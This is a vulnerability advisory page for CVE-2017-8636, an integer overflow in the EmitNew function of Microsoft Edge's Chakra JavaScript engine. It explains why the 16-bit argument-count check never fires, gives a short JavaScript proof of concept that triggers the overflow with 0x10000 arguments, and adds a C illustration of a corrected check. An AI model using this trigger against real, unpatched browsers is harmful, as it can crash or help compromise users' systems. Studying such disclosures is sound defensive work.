Microsoft Edge: Chakra: Integer overflow in EmitNew (CVE-2017-8636)

2017-08-17T00:00:00
ID SSV:96362
Type seebug
Reporter nu11
Modified 2017-08-17T00:00:00

Description

The bytecode generator uses the `EmitNew` function to handle `new` operators. Here is how the function checks for integer overflow:

```cpp
void EmitNew(ParseNode* pnode, ByteCodeGenerator* byteCodeGenerator, FuncInfo* funcInfo)
{
    Js::ArgSlot argCount = pnode->sxCall.argCount;
    argCount++; // include "this"

    BOOL fSideEffectArgs = FALSE;
    unsigned int tmpCount = CountArguments(pnode->sxCall.pnodeArgs, &fSideEffectArgs);
    Assert(argCount == tmpCount);

    if (argCount != (Js::ArgSlot)argCount)
    {
        Js::Throw::OutOfMemory();
    }
    ...
}
```

`Js::ArgSlot` is a 16-bit unsigned integer type, and `argCount` is already of type `Js::ArgSlot`, so the check `if (argCount != (Js::ArgSlot)argCount)` is pointless: casting a value to its own type cannot change it, and the comparison never fails. It cannot prevent the integer overflow at all.

PoC:

```javascript
let args = new Array(0x10000);
args = args.fill(0x1234).join(', ');
eval('new Array(' + args + ')');
```
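The failure mode described above in isolation, as an added example that is not Chakra's code: the page's same-type cast check beside a hypothetical width-correct one. `ArgSlot` models the 16-bit `Js::ArgSlot`; `vacuous_check_rejects`, `wrapped_arg_count`, `checked_arg_count` and `count_fits` are names chosen here.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Modelled on the page: Js::ArgSlot is a 16-bit unsigned type (name is ours). */
typedef uint16_t ArgSlot;

/* Same shape as the EmitNew check. argCount is already an ArgSlot, so the cast
 * is the identity and the comparison is never true, wrapped increment or not. */
bool vacuous_check_rejects(ArgSlot argCount)
{
    argCount++; /* include "this"; 0xFFFF silently wraps to 0 */
    return argCount != (ArgSlot)argCount; /* always false */
}

/* What the 16-bit increment actually produces for a given parser count. */
ArgSlot wrapped_arg_count(ArgSlot parserArgCount)
{
    ArgSlot argCount = parserArgCount;
    argCount++; /* include "this" */
    return argCount;
}

/* Hypothetical corrected check: do the arithmetic in a wider type and test
 * whether the result survives a round trip through ArgSlot before narrowing.
 * Returns false where the original code should have thrown OutOfMemory. */
bool checked_arg_count(unsigned int argsWithoutThis, ArgSlot *out)
{
    unsigned int total = argsWithoutThis + 1u; /* include "this" */
    if (total != (unsigned int)(ArgSlot)total) {
        return false; /* does not fit in 16 bits */
    }
    *out = (ArgSlot)total;
    return true;
}

/* Convenience wrapper: does this many call arguments (plus "this") fit? */
bool count_fits(unsigned int argsWithoutThis)
{
    ArgSlot unused;
    return checked_arg_count(argsWithoutThis, &unused);
}

int main(void)
{
    printf("vacuous check rejects 0xFFFF args: %d\n", vacuous_check_rejects(0xFFFF));
    printf("corrected check accepts 0xFFFF args: %d\n", count_fits(0xFFFF));
    return 0;
}
```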
